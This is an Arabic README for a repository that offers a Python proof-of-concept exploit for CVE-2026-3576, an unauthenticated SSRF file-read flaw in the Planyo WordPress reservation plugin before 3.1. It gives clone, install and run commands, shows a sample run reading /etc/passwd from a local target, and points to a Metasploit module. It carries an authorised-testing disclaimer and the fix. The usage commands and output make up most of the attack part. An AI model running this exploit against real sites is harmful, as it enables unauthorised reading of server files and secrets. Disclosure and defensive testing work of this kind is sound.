
إثبات مفهوم لاستغلال CVE-2026-3576
يحتوي هذا المستودع على برنامج إثبات مفهوم (PoC) مبني على لغة بايثون لاستغلال ثغرة CVE-2026-3576. يمكن العثور عليه أيضاً في Exploit-DB هنا.
كما قمت بتطوير وحدة Metasploit لهذا الاستغلال ويمكن العثور عليها هنا.
تم توفير هذا المشروع لأغراض تعليمية ولاختبارات الأمان المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها.
توجد ثغرة تزوير طلبات من جانب الخادم (SSRF) في إضافة Planyo Online Reservation System في ووردبريس قبل الإصدار 3.1. تسمح هذه الثغرة لمهاجم غير مصادق بتقديم عنوان file:// عبر معامل ulap_url، مما يؤدي إلى الوصول إلى ملفات عشوائية.
يمكن العثور على تقرير مفصل مع تحليل الكود المصدري وعرض توضيحي للاستغلال على مدونتي على Medium.
| المكوّن | الإصدار |
|---|
| الإضافة الثغرة | <=3.0 |
| الإضافة المُصححة | 3.1 |
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt
python exploit.py <base_url> -f <file location> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Checking if target is vulnerable...
[+] Version found: 2.9
[+] Target is vulnerable
[*] Attempting to read arbitrary file...
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
قم بترقية الإضافة إلى الإصدار 3.1.